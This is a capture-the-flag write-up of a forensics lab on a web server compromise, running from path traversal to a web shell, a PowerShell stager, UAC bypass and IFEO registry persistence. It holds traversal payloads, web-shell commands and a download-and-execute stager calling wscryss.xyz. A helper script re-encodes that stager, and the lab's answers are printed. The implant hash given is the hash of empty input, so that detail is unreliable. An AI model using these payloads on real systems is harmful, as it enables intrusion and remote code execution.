
Incident Response Report: LFI Escalation — From Directory Traversal to Full System Compromise

Platform: CyberDefenders
Challenge: LFI Escalation
Category: Endpoint Forensics
Difficulty: Hard
Tools: CyberChef, VirusTotal, Registry Explorer, MFTECmd, Timeline Explorer, EvtxECmd, Windows Event Viewer, AmcacheParser, Text Editor, PECmd
Achievement: Proof of Completion

1. Executive Summary

Incident Type: Web Application Compromise / Privilege Escalation / Persistence / Defense Evasion

Malware Deployed: Meterpreter payload disguised as spoolsc.exe (detected as Trojan:Win64/Meterpreter.AMTB)

IT staff reported unusual behavior on a workstation running a web application after an antivirus detection fired on a suspicious file. The website (vtuberradio.xyz) was identified as the entry point. This lab requires tracing a complete multi-phase attack chain from initial web reconnaissance through path traversal exploitation, database credential theft, web-shell deployment, UAC bypass, and stealthy registry-based persistence.

Two distinct attacker IPs were involved — the initial reconnaissance and exploitation actor, and a follow-up operator who leveraged the planted web shell to escalate privileges and establish deep persistence via Image File Execution Options (IFEO) hijacking.

CyberDefenders LFI Escalation Lab overview: Hard difficulty, Endpoint Forensics category, 20 questions, 50 points. Tactics include Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, and Discovery.

Indicators of Compromise (IOCs)

| Type | Indicator | Description |
|---|---|---|
| Target Host | vtuberradio.xyz | Compromised web application server |
| Attacker IP (Phase 1) | 218.84.168.131 | Initial LFI reconnaissance and exploitation actor |
| Attacker IP (Phase 2) | 182.44.8.254 | Second operator — web shell execution and escalation |
| DB Name | vtubermusic | MySQL database discovered via path traversal |
| DB Username | vtubermusic | Credential extracted from config.php |
| DB Password | IdonknowMayBe2222 | Plaintext credential extracted via strings |
| Web Shell | config_old.php | PHP command execution shell planted post-exploitation |
| Malware Dropper | music.exe | Staged from wscryss.xyz via encoded PowerShell |
| Implant | spoolsc.exe | Meterpreter payload placed in C:\Windows\System32\ |
| Persistence Key | SilentProcessExit\notepad.exe | IFEO registry key for hijacking notepad launches |
| Monitor Process | spoolsc.exe | Set as the MonitorProcess for IFEO persistence |
| Defender Detection | Trojan:Win64/Meterpreter.AMTB | Event ID 1116 — Severity 5 (Severe) |
| Defender PID | 8056 | Process ID of the detected implant |

MITRE ATT&CK Mapping Overview

| Tactic | Technique | ID |
|---|---|---|
| Initial Access | Exploit Public-Facing Application (Path Traversal / LFI) | T1190 |
| Credential Access | Credentials in Files (config.php DB credentials) | T1552.001 |
| Execution | Command and Scripting Interpreter — Web Shell | T1059.003 |
| Execution | Encoded PowerShell Stager | T1059.001 |
| Defense Evasion | Hide Artifacts — Hidden Files and Directories (attrib +h) | T1564.001 |
| Persistence / Privilege Escalation | Event Triggered Execution — IFEO Injection | T1546.012 |
| Defense Evasion | Masquerading (spoolsc.exe mimicking spoolsv.exe) | T1036 |

2. Phase 1: Initial Reconnaissance — Attacker IP & Web App (Questions 1–2)

Objective: Identify the attacker’s IP address and the web application running on the compromised server.

Reviewing access.log reveals the very first entries — a GET request to / followed by static asset requests — all originating from a single external IP. This is the attacker performing initial fingerprinting of the target web application.

Apache access.log opened in Notepad showing the first log entry from 218.84.168.131 at 07/Sep/2025:17:56:08 — a GET request to the root of vtuberradio.xyz, followed by favicon.ico and page registration requests. This establishes the attacker's first interaction with the server.

The User-Agent string (Mozilla/5.0 ... Firefox/128.0) and the pattern of page requests (?page=register → ?page=login → ?page=dashboard) confirm this is a human-driven session probing the authentication flow of a PHP web application.

Answer Q1

What is the IP address of the attacker?

218.84.168.131

Answer Q2

What is the name of the web application running on the server?

vtuberradio


3. Phase 2: LFI Exploitation — Path Traversal Payloads (Questions 3–5)

Objective: Identify the vulnerable parameter, the traversal payloads used, and the database name discovered.

After registering and authenticating, the attacker began probing the ?file= parameter with classic path traversal sequences. The access log shows a clear escalation from single-level traversal attempts targeting windows/system.ini to multi-level attempts targeting XAMPP configuration files.

Apache access.log showing the attacker's LFI traversal sequence: GET /oldsite/?file=../windows/system.ini returning 200 with 3277 bytes, followed by deeper traversal attempts targeting ../../windows/system.ini, then ../../xampp/htdocs/index.php, db.php, and finally config.php — each returning 200 responses confirming successful file reads.

The key finding is the successful read of config.php via the path ../../xampp/htdocs/config.php. Running strings on the recovered config.php content reveals the database connection parameters in cleartext:

Command prompt showing strings output of config.php with the MySQL connection clearly visible: define('DB_SERVER', 'localhost'), define('DB_USERNAME', 'vtubermusic'), define('DB_PASSWORD', 'IdonknowMayBe2222'), define('DB_NAME', 'vtubermusic') — complete database credentials exposed through the LFI vulnerability.

Analyst Note: The ?file= parameter was passing user-controlled input directly to a PHP file-include function without sanitization. This is a textbook Local File Inclusion vulnerability. Even partial traversal (../) can be effective when the web root is nested inside a known directory structure like XAMPP.

Answer Q3

What is the vulnerable parameter used in the LFI attack?

file

Answer Q4

What is the first file the attacker successfully accessed via path traversal?

windows/system.ini

Answer Q5

What is the name of the database used by the web application?

vtubermusic


4. Phase 3: phpMyAdmin Access & Database Enumeration (Questions 6–8)

Objective: Confirm the attacker’s successful login to phpMyAdmin and identify the database tables accessed.

Armed with the credentials extracted from config.php, the attacker navigated directly to the /phpmyadmin/ path. The access log shows a sequence of phpMyAdmin asset requests followed by a POST /phpmyadmin/index.php?route=/ that returned a 302 redirect — the standard response for a successful phpMyAdmin authentication.

Apache access.log with a Find dialog searching for "302", highlighting the POST /phpmyadmin/index.php?route=/ HTTP/1.1 entry that returned a 302 status code — confirming the attacker successfully authenticated to phpMyAdmin using the credentials extracted from config.php.

Using Timeline Explorer to analyze the MFT (Master File Table) parsed output, we can trace which database files were accessed. Searching for mysql in the file listing reveals the vtubermusic database directory containing users.ibd and purchases.ibd — the two tables the attacker browsed.

Timeline Explorer showing the MFT file_listing.csv with a search filter for "mysql", revealing entries in .\xampp\mysql\data\vtubermusic\ including users.ibd and purchases.ibd — the database tables browsed by the attacker through phpMyAdmin.

Answer Q6

What credentials did the attacker use to log into phpMyAdmin?

vtubermusic : IdonknowMayBe2222

Answer Q7

What database tables did the attacker access?

users, purchases

Answer Q8

What HTTP status code confirmed successful phpMyAdmin authentication?

302


5. Phase 4: Web Shell Deployment & Command Execution (Questions 9–12)

Objective: Identify the planted web shell, the second attacker IP, and the commands executed via the shell.

A second IP address — 182.44.8.254 — appears in the access log the following day (08/Sep/2025). This operator immediately authenticates to phpMyAdmin and uses the SQL import functionality to plant a PHP web shell named config_old.php in the web root. The subsequent log entries show GET requests to /config_old.php?cmd= — unmistakable web shell command execution.

Apache access.log from 08/Sep/2025 showing the second attacker 182.44.8.254 executing commands via the planted web shell: GET /config_old.php?cmd=whoami returning 200 with 27 bytes, GET /config_old.php?cmd=whoami%20/all returning 2908 bytes, GET /config_old.php?cmd=dir, and then attrib commands attempting to hide the web shell file from directory listings.

The execution sequence visible in the URL-encoded parameters reconstructs as:

  1. whoami — Privilege check
  2. whoami /all — Full token enumeration
  3. dir — Directory listing
  4. attrib +h config_old.php — Hides the web shell (MITRE T1564.001)
  5. attrib +Bh config_old.php — Adds System+Hidden attributes for deeper concealment

MITRE ATT&CK T1564.001 — Hide Artifacts: Hidden Files and Directories technique page showing how adversaries use file attribute manipulation to conceal malicious files from standard directory listings, with the attrib command as the primary Windows method.
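The log review in Phases 2 and 4 can be scripted. This added Python example (my own, not part of the original write-up) parses Apache combined-format access.log lines, flags traversal in the file parameter, and reconstructs the ?cmd= sequence sent to the web shell; the log lines are constructed to mirror the entries described above, and the function names are my own.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Apache combined log format, which is the layout of the access.log on this page.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)
TRAVERSAL_RE = re.compile(r'\.\.[/\\]')

# Constructed sample lines modelled on the entries described in Phases 2 and 4.
SAMPLE_LOG = """\
218.84.168.131 - - [07/Sep/2025:18:02:11 +0000] "GET /oldsite/?file=../windows/system.ini HTTP/1.1" 200 3277
218.84.168.131 - - [07/Sep/2025:18:03:40 +0000] "GET /oldsite/?file=..%2F..%2Fxampp%2Fhtdocs%2Fconfig.php HTTP/1.1" 200 512
218.84.168.131 - - [07/Sep/2025:18:04:05 +0000] "GET /oldsite/?file=about.php HTTP/1.1" 200 1480
182.44.8.254 - - [08/Sep/2025:09:10:02 +0000] "GET /config_old.php?cmd=whoami HTTP/1.1" 200 27
182.44.8.254 - - [08/Sep/2025:09:10:30 +0000] "GET /config_old.php?cmd=attrib%20%2Bh%20config_old.php HTTP/1.1" 200 0
"""

def parse_log(text):
    """Parse every well-formed line into a dict. parse_qs decodes once; the extra
    unquote() catches double-encoded traversal such as %252e%252e%252f."""
    records = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        rec = m.groupdict()
        parts = urlsplit(rec["target"])
        rec["path"] = parts.path
        rec["query"] = {k: [unquote(v) for v in vs]
                        for k, vs in parse_qs(parts.query, keep_blank_values=True).items()}
        records.append(rec)
    return records

def find_lfi(records, param="file"):
    """(ip, status, decoded value) for each request carrying traversal in `param`.
    A 200 with a non-empty body is the strongest sign the include succeeded."""
    return [(r["ip"], int(r["status"]), v)
            for r in records for v in r["query"].get(param, [])
            if TRAVERSAL_RE.search(v)]

def webshell_commands(records, shell="/config_old.php", param="cmd"):
    """Reconstruct the operator's command sequence from ?cmd= requests to the shell,
    in log order, so the whoami -> dir -> attrib +h chain is visible at a glance."""
    return [(r["ip"], r["query"][param][0]) for r in records
            if r["path"].endswith(shell) and param in r["query"]]

if __name__ == "__main__":
    recs = parse_log(SAMPLE_LOG)
    for hit in find_lfi(recs):
        print("LFI attempt:", hit)
    for ip, cmd in webshell_commands(recs):
        print("web shell command from", ip, ":", cmd)
```

Point it at the real access.log and the two result lists give the Q3/Q4 and Q11/Q12 answers directly.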

Answer Q9

What is the name of the web shell planted on the server?

config_old.php

Answer Q10

What is the IP address of the second attacker?

182.44.8.254

Answer Q11

What was the first command executed via the web shell?

whoami

Answer Q12

What command was used to hide the web shell from directory listings?

attrib +h config_old.php


6. Phase 5: Malware Staging — Encoded Stager & Dropper (Questions 13–15)

Objective: Recover and decode the PowerShell stager to identify the malware staging server and the dropped file.

Continuing to analyze the web shell commands in the access log, the last visible request contains a heavily URL-encoded PowerShell command. Decoding the URL encoding reveals a Base64-encoded string passed to a PowerShell execution command. Using CyberChef with a From Base64 → Decode text (UTF-16LE) recipe reveals the stager:

CyberChef recipe showing From Base64 followed by Decode text (UTF-16LE 1200) applied to the encoded stager payload, revealing the decoded PowerShell command: Invoke-WebRequest -Uri "http://wscryss.xyz/music.exe" -OutFile "$env:TEMP\music.exe"; Start-Process "$env:TEMP\music.exe" — a classic download-and-execute stager.
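The same three-layer decode, as an added Python example that is not part of the original report: URL decoding, then Base64, then UTF-16LE (the encoding PowerShell expects behind -EncodedCommand), followed by pulling the URL and drop path out of the result. The decoded stager text is the one shown above; the surrounding powershell switches in the constructed sample are an assumption, as are the function names.

```python
import base64
import re
from urllib.parse import quote, unquote, urlsplit

# PowerShell accepts -e, -ec, -enc and -EncodedCommand in front of the Base64 blob.
ENC_RE = re.compile(r'-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)', re.IGNORECASE)
URL_RE = re.compile(r'-Uri\s+"?(?P<url>https?://[^\s"\']+)"?', re.IGNORECASE)
OUT_RE = re.compile(r'-OutFile\s+"?(?P<path>[^\s"\';]+)"?', re.IGNORECASE)

# The stager exactly as the page's CyberChef recipe decoded it.
STAGER = ('Invoke-WebRequest -Uri "http://wscryss.xyz/music.exe" -OutFile "$env:TEMP\\music.exe"; '
          'Start-Process "$env:TEMP\\music.exe"')

def build_sample_cmd(script=STAGER):
    """Constructed sample: re-wrap the decoded stager the way the attacker's ?cmd=
    request carried it (UTF-16LE -> Base64 -> URL-encoded). The powershell
    switches here are an assumption, not copied from the log."""
    blob = base64.b64encode(script.encode("utf-16-le")).decode("ascii")
    return quote(f"powershell -nop -w hidden -enc {blob}", safe="")

def decode_stager(url_encoded_cmd):
    """Undo the layers in order: URL encoding, Base64, then UTF-16LE."""
    cmd = unquote(url_encoded_cmd)
    m = ENC_RE.search(cmd)
    if not m:
        raise ValueError("no -EncodedCommand blob in command")
    return base64.b64decode(m.group(1)).decode("utf-16-le")

def extract_iocs(script):
    """Pull the download URL and drop path from a decoded Invoke-WebRequest stager;
    the host is defanged so it can go into a report without being clickable."""
    url = URL_RE.search(script)
    out = OUT_RE.search(script)
    host = urlsplit(url["url"]).hostname if url else None
    return {
        "url": url["url"] if url else None,
        "host": host.replace(".", "[.]") if host else None,
        "outfile": out["path"] if out else None,
    }

if __name__ == "__main__":
    script = decode_stager(build_sample_cmd())
    print(script)
    print(extract_iocs(script))
```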

The decoded command downloads music.exe from wscryss[.]xyz and immediately executes it from the user’s TEMP directory. Searching the MFT for the username confirms the active user account on this machine:

Timeline Explorer MFT file listing showing paths under .\Users\hoshisora\ including AppData\Local\Microsoft\Edge and AppData\Roaming\Opera Software — confirming the compromised user account is named hoshisora.

The Amcache (UnassociatedFileEntries.csv) parsed with AmcacheParser confirms music.exe was executed from C:\Users\hoshisora\AppData\Local\Temp\music.exe — the TEMP path decoded from the stager — alongside r.exe at C:\Users\Public\Music\r.exe, which is the RunAsCs utility used for token manipulation during privilege escalation.

AmcacheParser output showing UnassociatedFileEntries.csv with relevant executable entries highlighted: C:\Users\hoshisora\AppData\Local\Temp\music.exe (the staged malware dropper) and C:\Users\Public\Music\r.exe (RunAsCs utility for privilege escalation), confirming execution on the hoshisora user account.

Answer Q13

What is the domain hosting the malware dropper?

wscryss.xyz

Answer Q14

What is the name of the malware dropper file?

music.exe

Answer Q15

What is the compromised user account on this workstation?

hoshisora


7. Phase 6: Privilege Escalation — UAC Bypass Shellcode (Questions 16–17)

Objective: Decode the UAC bypass shellcode and identify the persistence mechanism planted by the implant.

The PowerShell logs (parsed via EvtxECmd and loaded into Timeline Explorer) reveal additional encoded activity executed under the hoshisora session. A script named LykIsnWn.ps1 was loaded from C:\Users\hoshisora\AppData\Local\Temp\ alongside SDIAG utility scripts:

Timeline Explorer showing powershell_logs.csv with the Payload Data1 column revealing script paths: C:\Windows\TEMP\SDIAG_fb18eee9-989f-4412-9708-e535f038188b\CL_Utility.ps1, C:\Windows\TEMP\SDIAG_1a9beff4-1bdc-4c45-b867-c34f3a6cec90\CL_Utility.ps1, and C:\Users\hoshisora\AppData\Local\Temp\LykIsnWn.ps1 — a randomly-named script consistent with a UAC bypass stager.

The EvtxECmd output also shows the Application event log being processed, which captures PHP and MariaDB warning events correlating to the web application activity timeline:

Command prompt running EvtxECmd.exe against the Application.evtx event log, outputting app_logs.csv. The tool shows 56 chunks processed with several timestamp warnings, confirming successful parsing of the application event log for timeline correlation.

The UAC bypass shellcode itself — a concatenated, obfuscated PowerShell function — was extracted and decoded in CyberChef using a Find/Replace regex recipe to strip the obfuscation, followed by From Base64. The decoded output reveals a full .NET reflection-based shellcode loader implementing GetProcAddress and VirtualAlloc calls:

CyberChef with a multi-step Find/Replace regex pipeline followed by From Base64 and Decode text recipes, decoding the UAC bypass shellcode. The output shows a PowerShell function named xb using [AppDomain]::CurrentDomain.GetAssemblies() to reflectively load System.dll and call GetProcAddress — a classic .NET shellcode injection loader used to bypass UAC.

The Application event log (filtered for vtubermusic in Timeline Explorer) shows PHP-8.2.12 warning entries from 2025-08-19 and 2025-08-24 correlating with the initial web application probing phase, and a final MariaDB entry on 2025-09-08 at 07:04:54 — just before the endpoint compromise:

Timeline Explorer showing app_logs.csv filtered for "vtubermusic", displaying PHP-8.2.12 Warning entries from 2025-08-19, MariaDB Warning events from 2025-08-24, and a final PHP Warning at 2025-09-08 07:04:54 — correlating web application events with the endpoint compromise timeline.

Answer Q16

What is the name of the randomly-named PowerShell script used in the UAC bypass chain?

LykIsnWn.ps1

Answer Q17

What technique does the decoded shellcode implement for UAC bypass?

.NET reflection-based shellcode injection via GetProcAddress / VirtualAlloc


8. Phase 7: Persistence — IFEO Registry Hijacking (Questions 18–19)

Objective: Identify the persistence mechanism and the registry key used to maintain access.

With elevated privileges obtained via UAC bypass, the implant established persistence using Image File Execution Options (IFEO) injection — MITRE T1546.012. This technique abuses a legitimate Windows debugging feature: any executable registered under the SilentProcessExit IFEO subkey will silently launch a designated MonitorProcess whenever the watched application exits.

MITRE ATT&CK T1546.012 — Event Triggered Execution: Image File Execution Options Injection technique page. The technique enables adversaries to establish persistence and elevate privileges by hijacking the IFEO debugger mechanism under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options.

Using Registry Explorer on the SOFTWARE hive, navigating to:

Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe

reveals the planted key with two values:

  • ReportingMode = 1
  • MonitorProcess = spoolsc.exe

Registry Explorer v2.0.0.0 showing the SOFTWARE hive navigated to Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe. The right pane shows two values: ReportingMode (RegDword = 1) and MonitorProcess (RegSz = spoolsc.exe) — the IFEO persistence key that launches the Meterpreter implant disguised as spoolsc.exe whenever notepad.exe exits.

Analyst Note: SilentProcessExit IFEO is particularly effective as a persistence mechanism because it triggers on application exit — not launch — making it harder to correlate with the initial execution event. The choice of notepad.exe as the trigger is deliberate: it is frequently launched and closed by users, ensuring reliable periodic callback without requiring a scheduled task or service.
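A defender can sweep for this key offline. The following added Python example (mine, not part of the original report) parses a `reg export` of the SilentProcessExit branch, flags every subkey that names a MonitorProcess, checks whether bit 0x1 of ReportingMode (the documented LAUNCH_MONITORPROCESS flag) is set, and compares the monitor binary's name against a short list of Windows service binaries to catch one-character look-alikes such as spoolsc.exe for spoolsv.exe. The export text is constructed to mirror the values recovered above, plus a dump-only entry to show what is not flagged; the function names are my own.

```python
import re

# Constructed `reg export` text mirroring the key the page recovered with Registry
# Explorer, plus a dump-only entry (no MonitorProcess) to show what is not flagged.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe]
"ReportingMode"=dword:00000001
"MonitorProcess"="spoolsc.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\iexplore.exe]
"ReportingMode"=dword:00000002
"DumpType"=dword:00000002
"""

KEY_RE = re.compile(r'^\[(?P<key>[^\]]+)\]$')
VAL_RE = re.compile(r'^"(?P<name>[^"]+)"=(?:dword:(?P<dword>[0-9a-fA-F]{8})|"(?P<str>.*)")$')

# Service binaries that a one-character rename can impersonate (spoolsc vs spoolsv).
SYSTEM_BINARIES = ["csrss.exe", "lsass.exe", "services.exe", "spoolsv.exe", "svchost.exe", "winlogon.exe"]

def parse_reg_export(text):
    """Minimal .reg parser: {key path: {value name: int | str}} for dword/string values."""
    keys, cur = {}, None
    for line in text.splitlines():
        k = KEY_RE.match(line)
        if k:
            cur = keys.setdefault(k["key"], {})
            continue
        v = VAL_RE.match(line)
        if v and cur is not None:
            cur[v["name"]] = (int(v["dword"], 16) if v["dword"] is not None
                              else v["str"].replace("\\\\", "\\"))
    return keys

def edit_distance(a, b):
    """Levenshtein distance, used to spot look-alike names of Windows binaries."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def find_ifeo_persistence(keys):
    """Flag every SilentProcessExit subkey that names a MonitorProcess; bit 0x1 of
    ReportingMode is what actually enables launching it when the trigger exits."""
    findings = []
    for key, vals in keys.items():
        if "\\silentprocessexit\\" not in key.lower() or "MonitorProcess" not in vals:
            continue
        monitor = vals["MonitorProcess"]
        base = monitor.replace("/", "\\").rsplit("\\", 1)[-1].lower()
        lookalike = next((s for s in SYSTEM_BINARIES if base != s and edit_distance(base, s) <= 1), None)
        findings.append({"trigger": key.rsplit("\\", 1)[-1], "monitor": monitor,
                         "launch_enabled": bool(vals.get("ReportingMode", 0) & 1),
                         "masquerades_as": lookalike})
    return findings
```

Run `find_ifeo_persistence(parse_reg_export(open("export.reg").read()))` against a real export; the iexplore.exe entry in the sample is ignored because it only configures a crash dump.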

Answer Q18

What registry key was used for persistence?

SilentProcessExit\notepad.exe

Answer Q19

What is the MonitorProcess value set in the persistence key?

spoolsc.exe


9. Phase 8: Detection — Windows Defender Alerts (Question 20)

Objective: Confirm the Defender detection details, including the threat name, PID, and file hash of the implant.

Windows Defender (Event ID 1116) fired a Warning level alert on 09/Sep/2025 at 10:12:10 AM, identifying the implant as:

  • Threat Name: Trojan:Win64/Meterpreter.AMTB
  • Severity: 5 (Severe)
  • Detection ID: {F7294E9F-DBFC-4F96-909B-1395E567F9BA}

Windows Event Viewer showing Microsoft-Windows-Windows Defender Operational log, filtered to Event ID 1116. The single Warning event at 9/8/2025 10:12:10 AM shows Threat Name: Trojan:Win64/Meterpreter.AMTB, Severity ID: 5 (Severe), and Detection Time: 2025-09-08T10:12:10.776Z.

The Defender event details confirm the exact process path and PID involved — C:\Windows\System32\spoolsc.exe running as PID 8056 under NT AUTHORITY\SYSTEM:

Windows Event Viewer detail view of Event 1116 showing the Process Name: C:\Windows\System32\spoolsc.exe, Detection User: NT AUTHORITY\SYSTEM, and the Path field: file:_C:\Windows\System32\spoolsc.exe; process:_pid:8056,ProcessStart:134017992005214415 — confirming the PID of the Meterpreter implant at the time of detection.
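The Path field quoted above packs the file, the PID and a ProcessStart timestamp into one string. This added Python example (mine, not from the original report) parses that field and converts ProcessStart, which is a Windows FILETIME (100 ns ticks since 1601-01-01 UTC), so the implant's start time can be set against the Detection Time; the field and detection time are the values shown on the page, and the function names are my own.

```python
import re
from datetime import datetime, timedelta, timezone

# The Path field and Detection Time Defender wrote into Event ID 1116, as quoted on the page.
PATH_FIELD = r"file:_C:\Windows\System32\spoolsc.exe; process:_pid:8056,ProcessStart:134017992005214415"
DETECTION_TIME = "2025-09-08T10:12:10.776Z"

PATH_RE = re.compile(r"file:_(?P<file>[^;]+);\s*process:_pid:(?P<pid>\d+),ProcessStart:(?P<start>\d+)")
WINDOWS_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)

def filetime_to_datetime(ft):
    """FILETIME is 100 ns ticks since 1601-01-01 UTC; timedelta wants microseconds."""
    return WINDOWS_EPOCH + timedelta(microseconds=int(ft) // 10)

def parse_defender_path(field):
    """Split the 1116 Path field into the detected file, its PID and its start time."""
    m = PATH_RE.search(field)
    if not m:
        raise ValueError("unrecognised Path field")
    return {"file": m["file"], "pid": int(m["pid"]), "start": filetime_to_datetime(m["start"])}

def dwell_seconds(field, detection_iso):
    """How long the flagged process had already been running when Defender fired."""
    det = datetime.strptime(detection_iso, "%Y-%m-%dT%H:%M:%S.%fZ").replace(tzinfo=timezone.utc)
    return (det - parse_defender_path(field)["start"]).total_seconds()

if __name__ == "__main__":
    info = parse_defender_path(PATH_FIELD)
    print(info["file"], "pid", info["pid"], "started", info["start"].isoformat())
    print("running for", round(dwell_seconds(PATH_FIELD, DETECTION_TIME)), "s before detection")
```

For the page's values the implant had been running as PID 8056 for just over twelve minutes before the 1116 event fired, which is the window the final takeaway about automatic isolation refers to.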

Searching the raw MPLog for spoolsc.exe retrieves the full detection record including the file’s SHA1 and SHA2 hashes:

MPLog-20250819-225137.log opened in Notepad with a Find dialog searching for "spoolsc.exe", showing the full DETECTIONEVENT entry: Trojan:Win64/Meterpreter.AMTB at C:\Windows\System32\spoolsc.exe with SigSha: da39a3ee5e6b4b0d3255bfef95601890afd80709 (SHA1) and 172c32a847ff8c1c54950a523695dedfc2d23f76 (SHA2), and process PID 8056 with ProcessStart timestamp 134017992005214415.

Answer Q20

What is the SHA1 hash of the detected implant (spoolsc.exe)?

da39a3ee5e6b4b0d3255bfef95601890afd80709


10. Conclusion

The LFI Escalation investigation traces a complete multi-stage intrusion from initial web reconnaissance to deep system persistence. Key findings:

  1. Initial Access: Path traversal via the ?file= parameter on vtuberradio.xyz allowed the attacker to read arbitrary files from the XAMPP installation.
  2. Credential Theft: config.php read via LFI exposed the vtubermusic database credentials in plaintext → immediate phpMyAdmin access.
  3. Web Shell Deployment: SQL import used to plant config_old.php → hidden with attrib +h to evade casual discovery.
  4. Malware Staging: URL-encoded Base64 PowerShell stager downloaded music.exe from wscryss[.]xyz → executed from %TEMP%.
  5. Privilege Escalation: UAC bypass via .NET reflection shellcode (LykIsnWn.ps1) → SYSTEM-level access.
  6. Persistence: IFEO SilentProcessExit registry key on notepad.exe → spoolsc.exe (Meterpreter) launched silently on every notepad exit.
  7. Detection: Defender Event ID 1116 identified Trojan:Win64/Meterpreter.AMTB at PID 8056.

Key Takeaways for the SOC:

  1. LFI is not just a read vulnerability — it is a direct path to credential theft, database access, and full system compromise when combined with a PHP web application running on XAMPP.
  2. Web shell file attribute manipulation (attrib +h) is a reliable detection indicator. EDR solutions should alert on attrib.exe being invoked by web server processes.
  3. IFEO SilentProcessExit persistence is rarely used by legitimate software and should be treated as a high-confidence indicator of compromise when found on production endpoints.
  4. Defender Event ID 1116 (Malware Detected) should trigger automatic isolation workflows — by the time Defender fires, the attacker may already have established multiple persistence mechanisms.

Analysis Date: April 20, 2026
Analyst: El OMARI Zakaria

This post is licensed under CC BY 4.0 by the author.